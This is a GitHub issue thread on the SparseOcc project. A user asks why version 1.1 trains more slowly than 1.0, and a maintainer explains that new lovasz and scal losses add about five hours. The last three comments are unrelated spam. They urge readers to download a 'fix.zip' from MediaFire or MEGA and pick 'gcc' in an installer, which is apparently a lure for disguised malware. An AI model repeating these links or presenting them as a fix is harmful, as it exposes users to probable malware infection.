### ISSUE TITLE
我在1.0版本训练时间明显比1.1短很多

### ISSUE THREAD

**Issue by stickygao** [MCG-NJU/SparseOcc#46]
1.1明明epoch少为什么训练要长

**Comment by YANG-CY-163** [comment]
1.1版本里我们增强了loss设置，增加了lovasz loss和scal loss, 训练时24e在4卡a100上会慢5h左右

**Comment by stickygao** [comment]
好的感谢

**Comment by YANG-CY-163** [comment]
1.1版本里我们增强了loss设置，增加了lovasz loss和scal loss, 训练时同样24e的setting下，在4卡a100上正常应该是慢5h左右

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
